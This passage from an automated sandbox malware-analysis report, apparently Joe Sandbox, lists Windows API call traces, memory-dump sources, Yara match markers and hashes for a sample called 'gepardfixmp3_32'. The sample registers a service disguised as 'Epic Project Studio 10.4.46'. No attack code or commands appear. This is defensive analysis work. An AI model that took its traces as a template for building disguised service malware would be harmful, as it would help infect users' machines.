                                                            • htonl.WS2_32(00000000), ref: 02C249C8
                                                            • htonl.WS2_32(00000000), ref: 02C249CF
                                                            • htons.WS2_32(?), ref: 02C249EF
                                                            • htons.WS2_32(?), ref: 02C249F9
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_memmove_sprintf
                                                            • String ID:
                                                            • API String ID: 1645262487-0
                                                            • Opcode ID: a0d3285bae599bdd55fe70251966c34ee760767f7a3813e6fff40fc48c83ec37
                                                            • Instruction ID: fac78379a975153057fc31434551a494796f62cf687a15eb309ed63cab55a1d1
                                                            • Opcode Fuzzy Hash: a0d3285bae599bdd55fe70251966c34ee760767f7a3813e6fff40fc48c83ec37
                                                            • Instruction Fuzzy Hash: 80023871D10269EFDF25DBA4C844BEEBBB9AF08304F10455AE509B7280DF745A88DFA1
                                                            APIs
                                                            • RegisterServiceCtrlHandlerA.ADVAPI32(Epic Project Studio 10.4.46,0040235E), ref: 004023C1
                                                            • SetServiceStatus.ADVAPI32(0040C408), ref: 00402420
                                                            • GetLastError.KERNEL32 ref: 00402422
                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
                                                            • GetLastError.KERNEL32 ref: 00402450
                                                            • SetServiceStatus.ADVAPI32(0040C408), ref: 00402480
                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000022CB,00000000,00000000,00000000), ref: 0040248C
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
                                                            • CloseHandle.KERNEL32 ref: 004024A1
                                                            • SetServiceStatus.ADVAPI32(0040C408), ref: 004024CA
                                                            Strings
                                                            • Epic Project Studio 10.4.46, xrefs: 004023BC
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3384337183.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.3384337183.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                            • String ID: Epic Project Studio 10.4.46
                                                            • API String ID: 3346042915-2069739283
                                                            • Opcode ID: e0e016b3ce41aceda6f3121d900e1462fe799c01ac3834b95fdd7218fc4c2b52
                                                            • Instruction ID: f825968775c1ee2d0578391505e9de4ad612d0f41d638f9cce85b6cf1f241ff7
                                                            • Opcode Fuzzy Hash: e0e016b3ce41aceda6f3121d900e1462fe799c01ac3834b95fdd7218fc4c2b52
                                                            • Instruction Fuzzy Hash: A321D871441214EBC2105F16EFE9A267FA8FBD5794711823EE544B22B1C7B90149CF6D
                                                            APIs
                                                            • RtlDecodePointer.NTDLL(?), ref: 02C3834A
                                                            • _free.LIBCMT ref: 02C38363
                                                              • Part of subcall function 02C32F84: HeapFree.KERNEL32(00000000,00000000,?,02C35CE2,00000000,00000104,76230A60), ref: 02C32F98
                                                              • Part of subcall function 02C32F84: GetLastError.KERNEL32(00000000,?,02C35CE2,00000000,00000104,76230A60), ref: 02C32FAA
                                                            • _free.LIBCMT ref: 02C38376
                                                            • _free.LIBCMT ref: 02C38394
                                                            • _free.LIBCMT ref: 02C383A6
                                                            • _free.LIBCMT ref: 02C383B7
                                                            • _free.LIBCMT ref: 02C383C2
                                                            • _free.LIBCMT ref: 02C383E6
                                                            • RtlEncodePointer.NTDLL(009D5080), ref: 02C383ED
                                                            • _free.LIBCMT ref: 02C38402
                                                            • _free.LIBCMT ref: 02C38418
                                                            • _free.LIBCMT ref: 02C38440
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 3064303923-0
                                                            • Opcode ID: 65ba806536f00aabbc4311cf82992e6a9db7a09664b0c346b8bf9e230b010010
                                                            • Instruction ID: 1ba46110e7c85e08a1d4e0095486dec91e375cbeb174dc2bd529c1a8a0b75688
                                                            • Opcode Fuzzy Hash: 65ba806536f00aabbc4311cf82992e6a9db7a09664b0c346b8bf9e230b010010
                                                            • Instruction Fuzzy Hash: F0216D32D417718BDB665F14E84071AB769EB883243680F29E808A7240C735DDA49F95
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 02C24D8B
                                                            • RtlEnterCriticalSection.NTDLL(02C571E0), ref: 02C24DB7
                                                            • RtlLeaveCriticalSection.NTDLL(02C571E0), ref: 02C24DC3
                                                              • Part of subcall function 02C24BED: __EH_prolog.LIBCMT ref: 02C24BF2
                                                              • Part of subcall function 02C24BED: InterlockedExchange.KERNEL32(?,00000000), ref: 02C24CF2
                                                            • RtlEnterCriticalSection.NTDLL(02C571E0), ref: 02C24E93
                                                            • RtlLeaveCriticalSection.NTDLL(02C571E0), ref: 02C24E99
                                                            • RtlEnterCriticalSection.NTDLL(02C571E0), ref: 02C24EA0
                                                            • RtlLeaveCriticalSection.NTDLL(02C571E0), ref: 02C24EA6
                                                            • RtlEnterCriticalSection.NTDLL(02C571E0), ref: 02C250A7
                                                            • RtlLeaveCriticalSection.NTDLL(02C571E0), ref: 02C250AD
                                                            • RtlEnterCriticalSection.NTDLL(02C571E0), ref: 02C250B8
                                                            • RtlLeaveCriticalSection.NTDLL(02C571E0), ref: 02C250C1
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                            • String ID:
                                                            • API String ID: 2062355503-0
                                                            • Opcode ID: e1c406c73c0433007f29a6a2e09b363465c1ea2a9a2eb31b4a1ea79bc486c3f7
                                                            • Instruction ID: 02fb2605694b32928f4990108d35ce6e2dc8cfc7941a1bab429855465f4b5367
                                                            • Opcode Fuzzy Hash: e1c406c73c0433007f29a6a2e09b363465c1ea2a9a2eb31b4a1ea79bc486c3f7
                                                            • Instruction Fuzzy Hash: E9B13A75D0026DDFEF25DFA0C844BEEBBB9AF05314F10415AE80576280DB745A89CFA6
                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402F34), ref: 00403BBD
                                                            • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402F34), ref: 00403BD1
                                                            • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402F34), ref: 00403BFD
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402F34), ref: 00403C35
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402F34), ref: 00403C57
                                                            • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402F34), ref: 00403C70
                                                            • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402F34), ref: 00403C83
                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00403CC1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3384337183.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.3384337183.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                            • String ID: 4/@
                                                            • API String ID: 1823725401-3101945251
                                                            • Opcode ID: aff10945ecf90bbee9edc284fe0c12867232451494807f8f70b2732d2a40bc2d
                                                            • Instruction ID: a2970ceca2a6c3f976dc545d3d2173026391ae6ff2d108e1c7f08cdddd2a955e
                                                            • Opcode Fuzzy Hash: aff10945ecf90bbee9edc284fe0c12867232451494807f8f70b2732d2a40bc2d
                                                            • Instruction Fuzzy Hash: AD31F27350C1245EE7202F785DC883B7E9CEA4534A711093FF942F3380EA798E81466D
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 02C23428
                                                            • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 02C2346B
                                                            • GetProcAddress.KERNEL32(00000000), ref: 02C23472
                                                            • GetLastError.KERNEL32 ref: 02C23486
                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02C234D7
                                                            • RtlEnterCriticalSection.NTDLL(00000018), ref: 02C234ED
                                                            • RtlLeaveCriticalSection.NTDLL(00000018), ref: 02C23518
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
                                                            • String ID: CancelIoEx$KERNEL32
                                                            • API String ID: 2902213904-434325024
                                                            • Opcode ID: 5050d197376e6a5989b020049a5f2da50b4fce4ef1dd224a5896920db7db3f1e
                                                            • Instruction ID: 00a3be73428e3d1306976f2ee255d827f99152340f47932e735b11272ea56691
                                                            • Opcode Fuzzy Hash: 5050d197376e6a5989b020049a5f2da50b4fce4ef1dd224a5896920db7db3f1e
                                                            • Instruction Fuzzy Hash: E6319EB6900355DFDB019F64C8447ABBBF9FF88314F0049AAE8059B241DB749905CFA1
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00404381,?,Microsoft Visual C++ Runtime Library,00012010,?,0040858C,?,004085DC,?,?,?,Runtime Error!Program: ), ref: 0040658A
                                                            • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004065A2
                                                            • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004065B3
                                                            • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 004065C0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3384337183.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.3384337183.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad
                                                            • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                            • API String ID: 2238633743-4044615076
                                                            • Opcode ID: 987b992b6f5bbeab899bec9017d6b859524fa9c80776c30a59c8d29f16b735e1
                                                            • Instruction ID: 34c45dea863b0ad37b671b2ee6745cf1fa65c172ae9c71c573f5c1b511995102
                                                            • Opcode Fuzzy Hash: 987b992b6f5bbeab899bec9017d6b859524fa9c80776c30a59c8d29f16b735e1
                                                            • Instruction Fuzzy Hash: FA017571A40201FFCB209FB5BFC492B3AE99B58690306193FB541F2291DE79C815DB68
                                                            APIs
                                                            • LCMapStringW.KERNEL32(00000000,00000100,00408658,00000001,00000000,00000000,00000103,00000001,00000000,?,00406317,00200020,00000000,?,00000000,00000000), ref: 00406899
                                                            • LCMapStringA.KERNEL32(00000000,00000100,00408654,00000001,00000000,00000000,?,00406317,00200020,00000000,?,00000000,00000000,00000001), ref: 004068B5
                                                            • LCMapStringA.KERNEL32(00000000,?,00000000,00200020,00406317,?,00000103,00000001,00000000,?,00406317,00200020,00000000,?,00000000,00000000), ref: 004068FE
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00406317,00200020,00000000,?,00000000,00000000), ref: 00406936
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00406317,00200020,00000000,?,00000000), ref: 0040698E
                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00406317,00200020,00000000,?,00000000), ref: 004069A4
                                                            • LCMapStringW.KERNEL32(00000000,?,00406317,00000000,00406317,?,?,00406317,00200020,00000000,?,00000000), ref: 004069D7
                                                            • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00406317,00200020,00000000,?,00000000), ref: 00406A3F
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3384337183.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.3384337183.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: String$ByteCharMultiWide
                                                            • String ID:
                                                            • API String ID: 352835431-0
                                                            • Opcode ID: e9f64dd7570e4df949ea1626fd4153753d4334a99172a5ae067b945d03b43c58
                                                            • Instruction ID: 8dbeb6cb8c932cbdef2775d2a29e2de0fc7c35b208bd80b0a47b5516e3ba15ce
                                                            • Opcode Fuzzy Hash: e9f64dd7570e4df949ea1626fd4153753d4334a99172a5ae067b945d03b43c58
                                                            • Instruction Fuzzy Hash: 3E518A71500209EBCF219F94CD45AAF7BB5FB49714F12413AF912B12A0C73A8C21DB69
                                                            APIs
                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 004042CA
                                                            • GetStdHandle.KERNEL32(000000F4,0040858C,00000000,?,00000000,00000000), ref: 004043A0
                                                            • WriteFile.KERNEL32(00000000), ref: 004043A7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3384337183.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.3384337183.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: File$HandleModuleNameWrite
                                                            • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                            • API String ID: 3784150691-4022980321
                                                            • Opcode ID: 4bb15c7821e3b7df3b39c29bb8507035fb8a1658cdd6742b24a8a426161d7798
                                                            • Instruction ID: ad501088bf1d437e3d5a217a77e101a13ac7783d72fc0021c8d9dd27a33d1b06
                                                            • Opcode Fuzzy Hash: 4bb15c7821e3b7df3b39c29bb8507035fb8a1658cdd6742b24a8a426161d7798
                                                            • Instruction Fuzzy Hash: 52318772600218AFDF2096608E45FDA736DAF85304F1004BFF944B61D1EA789D458A5D
                                                            APIs
                                                            • OpenEventA.KERNEL32(00100002,00000000,00000000,4E988375), ref: 02C316C0
                                                            • CloseHandle.KERNEL32(00000000), ref: 02C316D5
                                                            • ResetEvent.KERNEL32(00000000,4E988375), ref: 02C316DF
                                                            • CloseHandle.KERNEL32(00000000,4E988375), ref: 02C31714
                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,4E988375), ref: 02C3178A
                                                            • CloseHandle.KERNEL32(00000000), ref: 02C3179F
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseEventHandle$CreateOpenReset
                                                            • String ID:
                                                            • API String ID: 1285874450-0
                                                            • Opcode ID: 3291ed8f72422ef7461f785a2aac890b2f340d225bc13ea14832e0c0b05819ed
                                                            • Instruction ID: bfd28df3c6b91a7606aae8f5bd762920dedd45b6762ec75ea39f8aee7b839a77
                                                            • Opcode Fuzzy Hash: 3291ed8f72422ef7461f785a2aac890b2f340d225bc13ea14832e0c0b05819ed
                                                            • Instruction Fuzzy Hash: 13414F74D00358AFDF21CFE5C848BAEB7B8EF45764F184A19E419EB280D7B09A05CB91
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02C220AC
                                                            • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02C220CD
                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C220D8
                                                            • InterlockedDecrement.KERNEL32(?), ref: 02C2213E
                                                            • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 02C2217A
                                                            • InterlockedDecrement.KERNEL32(?), ref: 02C22187
                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C221A6
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
                                                            • String ID:
                                                            • API String ID: 1171374749-0
                                                            • Opcode ID: 81686880fc213d561c5badd71ce8b641be5dfee1b2e16fc186541465b64fc658
                                                            • Instruction ID: 7ddb1ae143a6009f785d80f0ea01ffaff49aad15c79c4ffad07ffd3533868e4b
                                                            • Opcode Fuzzy Hash: 81686880fc213d561c5badd71ce8b641be5dfee1b2e16fc186541465b64fc658
                                                            • Instruction Fuzzy Hash: 474126755047119FC321DF25D884A6BBBF9FFC8654F044A1EF89A82650DB30EA09CFA2
                                                            APIs
                                                              • Part of subcall function 02C31EE0: OpenEventA.KERNEL32(00100002,00000000,?,?,?,02C3173E,?,?), ref: 02C31F0F
                                                              • Part of subcall function 02C31EE0: CloseHandle.KERNEL32(00000000,?,?,02C3173E,?,?), ref: 02C31F24
                                                              • Part of subcall function 02C31EE0: SetEvent.KERNEL32(00000000,02C3173E,?,?), ref: 02C31F37
                                                            • OpenEventA.KERNEL32(00100002,00000000,00000000,4E988375), ref: 02C316C0
                                                            • CloseHandle.KERNEL32(00000000), ref: 02C316D5
                                                            • ResetEvent.KERNEL32(00000000,4E988375), ref: 02C316DF
                                                            • CloseHandle.KERNEL32(00000000,4E988375), ref: 02C31714
                                                            • __CxxThrowException@8.LIBCMT ref: 02C31745
                                                              • Part of subcall function 02C3456A: RaiseException.KERNEL32(?,?,02C2FB63,?,?,?,?,?,?,?,02C2FB63,?,02C50F98,?), ref: 02C345BF
                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,4E988375), ref: 02C3178A
                                                            • CloseHandle.KERNEL32(00000000), ref: 02C3179F
                                                              • Part of subcall function 02C31C20: GetCurrentProcessId.KERNEL32(?), ref: 02C31C79
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,4E988375), ref: 02C317AF
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
                                                            • String ID:
                                                            • API String ID: 2227236058-0
                                                            • Opcode ID: 9e729961e18b0d2cd467ca8fc32b550c3cd95501beff62cbdd7cab906dba6150
                                                            • Instruction ID: 6f21ff2f597ef72764ebc71aefad1ab4da8085c28b09300af19e77fb132d6849
                                                            • Opcode Fuzzy Hash: 9e729961e18b0d2cd467ca8fc32b550c3cd95501beff62cbdd7cab906dba6150
                                                            • Instruction Fuzzy Hash: 97315275D00308AFDF22CBE5DC45BADB7B9AF45364F1C0929E81DEB280D7A09A158B61
                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02C22706
                                                            • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02C2272B
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02C45B63), ref: 02C22738
                                                              • Part of subcall function 02C21712: __EH_prolog.LIBCMT ref: 02C21717
                                                            • SetWaitableTimer.KERNEL32(?,?,000493E0,00000000,00000000,00000000), ref: 02C22778
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02C227D9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                            • String ID: timer
                                                            • API String ID: 4293676635-1792073242
                                                            • Opcode ID: 12bc707321295724ddde14a0290b9994fc6e262c2a5e7fd14d5ca5aa757ea5d2
                                                            • Instruction ID: 477e18e319fb601b4412a3337da52eb33f9a158a32b05af3d1560c9b88f28aa8
                                                            • Opcode Fuzzy Hash: 12bc707321295724ddde14a0290b9994fc6e262c2a5e7fd14d5ca5aa757ea5d2
                                                            • Instruction Fuzzy Hash: B7317CB1909715AFD310DF25C984B57BBE8FB48B24F004A2EF85587680DB70E918CFA6
                                                            APIs
                                                            • __init_pointers.LIBCMT ref: 02C35DA4
                                                              • Part of subcall function 02C38512: RtlEncodePointer.NTDLL(00000000), ref: 02C38515
                                                              • Part of subcall function 02C38512: __initp_misc_winsig.LIBCMT ref: 02C38530
                                                              • Part of subcall function 02C38512: GetModuleHandleW.KERNEL32(kernel32.dll,?,02C51598,00000008,00000003,02C50F7C,?,00000001), ref: 02C39291
                                                              • Part of subcall function 02C38512: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02C392A5
                                                              • Part of subcall function 02C38512: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02C392B8
                                                              • Part of subcall function 02C38512: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02C392CB
                                                              • Part of subcall function 02C38512: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02C392DE
                                                              • Part of subcall function 02C38512: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 02C392F1
                                                              • Part of subcall function 02C38512: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 02C39304
                                                              • Part of subcall function 02C38512: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 02C39317
                                                              • Part of subcall function 02C38512: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 02C3932A
                                                              • Part of subcall function 02C38512: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 02C3933D
                                                              • Part of subcall function 02C38512: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 02C39350
                                                              • Part of subcall function 02C38512: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 02C39363
                                                              • Part of subcall function 02C38512: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 02C39376
                                                              • Part of subcall function 02C38512: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 02C39389
                                                              • Part of subcall function 02C38512: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 02C3939C
                                                              • Part of subcall function 02C38512: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 02C393AF
                                                            • __mtinitlocks.LIBCMT ref: 02C35DA9
                                                            • __mtterm.LIBCMT ref: 02C35DB2
                                                              • Part of subcall function 02C35E1A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 02C38948
                                                              • Part of subcall function 02C35E1A: _free.LIBCMT ref: 02C3894F
                                                              • Part of subcall function 02C35E1A: RtlDeleteCriticalSection.NTDLL(02C53978), ref: 02C38971
                                                            • __calloc_crt.LIBCMT ref: 02C35DD7
                                                            • __initptd.LIBCMT ref: 02C35DF9
                                                            • GetCurrentThreadId.KERNEL32 ref: 02C35E00
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                            • String ID:
                                                            • API String ID: 3567560977-0
                                                            • Opcode ID: 9c0073a2ef98b645947059bba498601a39cfa44ae5bd79080f7843b91f8777fc
                                                            • Instruction ID: 06f93dc9bce2d1875950a910d6b5ebf3c83ce1c2de65603c8a6126bd05204bcc
                                                            • Opcode Fuzzy Hash: 9c0073a2ef98b645947059bba498601a39cfa44ae5bd79080f7843b91f8777fc
                                                            • Instruction Fuzzy Hash: C3F0F0325693A11AEA3A7A78BC4575B37C69B097B0B600F29F851D60C0FF24859169D0
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 02C334EB
                                                            • GetProcAddress.KERNEL32(00000000), ref: 02C334F2
                                                            • RtlEncodePointer.NTDLL(00000000), ref: 02C334FE
                                                            • RtlDecodePointer.NTDLL(00000001), ref: 02C3351B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                            • String ID: RoInitialize$combase.dll
                                                            • API String ID: 3489934621-340411864
                                                            • Opcode ID: c20d202c303d76344a5e04a7635274a2ef431ac04eeb3492017d28de009349ec
                                                            • Instruction ID: 824132857cbde847a45fda02bcd131c296d85a86bc1484ab556ec0882eae58fa
                                                            • Opcode Fuzzy Hash: c20d202c303d76344a5e04a7635274a2ef431ac04eeb3492017d28de009349ec
                                                            • Instruction Fuzzy Hash: D2E01274DD0390ABEF111F70EC09B0737A9AB91702F504E64F406E1185CBB591A89F94
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02C334C0), ref: 02C335C0
                                                            • GetProcAddress.KERNEL32(00000000), ref: 02C335C7
                                                            • RtlEncodePointer.NTDLL(00000000), ref: 02C335D2
                                                            • RtlDecodePointer.NTDLL(02C334C0), ref: 02C335ED
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                            • String ID: RoUninitialize$combase.dll
                                                            • API String ID: 3489934621-2819208100
                                                            • Opcode ID: bed109885bae1aa1e391dfcb8279335b0fa13a06021ea01118378fcaba1988ef
                                                            • Instruction ID: bc3e006801c71dabf6daea01d5e2c5ade9024541c8d494550a8e1e926315a4b8
                                                            • Opcode Fuzzy Hash: bed109885bae1aa1e391dfcb8279335b0fa13a06021ea01118378fcaba1988ef
                                                            • Instruction Fuzzy Hash: FBE0B6B4DD1314EBEB515F60AD0DB077AA9BB80705F604F64F106E1294DBB49268CB98
                                                            APIs
                                                            • TlsGetValue.KERNEL32(FFFFFFFF,4E988375,?,?,?,?,00000000,02C46AC8,000000FF,02C321DA), ref: 02C31F7A
                                                            • TlsSetValue.KERNEL32(FFFFFFFF,02C321DA,?,?,00000000), ref: 02C31FE7
                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C32011
                                                            • HeapFree.KERNEL32(00000000), ref: 02C32014
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: HeapValue$FreeProcess
                                                            • String ID:
                                                            • API String ID: 1812714009-0
                                                            • Opcode ID: e1aeb6afc2cf888b0ec74f322efc49c971e27f51cf5d5861793ea71ff5e28efa
                                                            • Instruction ID: 8c457187801eba66b81329d8c9385860ee57b97346db9a5bd4ba091adaf84d2a
